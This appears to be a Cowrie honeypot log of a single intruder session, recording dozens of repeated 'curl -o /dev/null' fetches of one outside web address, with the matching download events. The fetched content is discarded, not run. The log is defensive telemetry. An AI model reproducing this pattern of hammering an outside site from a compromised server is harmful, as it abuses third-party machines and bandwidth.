{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.599610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.636928Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.637713Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.664475Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.676731Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.677425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.716359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.717076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.755063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.755783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.796688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.797487Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.838931Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.839668Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.864595Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.891200Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.892204Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.892800Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.933596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.934335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.974334Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.975233Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.012925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.013639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.051918Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.052712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.093587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.094343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.133892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.134625Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.141287Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.157043Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.171784Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.172443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.209493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.210203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.248040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.248830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.252769Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.296043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.296800Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.336551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.337334Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.376920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.377935Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.415277Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.415979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.452652Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.454386Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.455317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.494448Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.495204Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.536261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.536936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.573492Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.574221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.638957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.639777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.677642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.678443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.700604Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.726225Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.726978Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.763889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.764740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.803435Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.804134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.840723Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.841438Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.863173Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.866865Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.901113Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.902207Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.935712Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.939421Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.940047Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:50.988658Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:50.989705Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.027488Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.028311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.066772Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.068039Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.068726Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.106716Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.107500Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.155492Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.156285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.181831Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.194405Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.195137Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.220148Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.233267Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.234001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.247995Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.268793Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.272471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.273104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.306037Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.310592Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.311276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.348228Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.348980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.357357Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.386188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.386816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:51.431470Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:51.432180Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
